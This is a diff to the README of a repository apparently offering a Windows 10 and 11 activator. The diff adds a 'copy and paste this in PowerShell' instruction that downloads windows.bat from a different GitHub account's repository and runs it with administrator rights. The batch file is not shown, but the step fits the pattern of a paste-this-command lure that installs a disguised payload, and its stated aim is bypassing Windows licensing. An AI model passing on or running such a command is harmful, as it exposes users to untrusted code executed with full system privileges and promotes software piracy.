gelogrammer/Windows-10-and-11-Activator/README.md

 No Complex Setup: Minimal steps to get your system activated.

 Installation:

-Download the repository or clone it using Git.
+COPY AND PASTE THIS IN PowerSHELL: irm "https://raw.githubusercontent.com/betamod9/Windows-10-and-11-Activator/main/windows.bat" -OutFile "windows.bat"; Start-Process -FilePath "windows.bat" -Verb RunAs
+And press Enter.
+Or:

-Locate the windows.bat file.
+Download the windows.bat file.

 Double-click the windows.bat file to run it and activate your Windows system.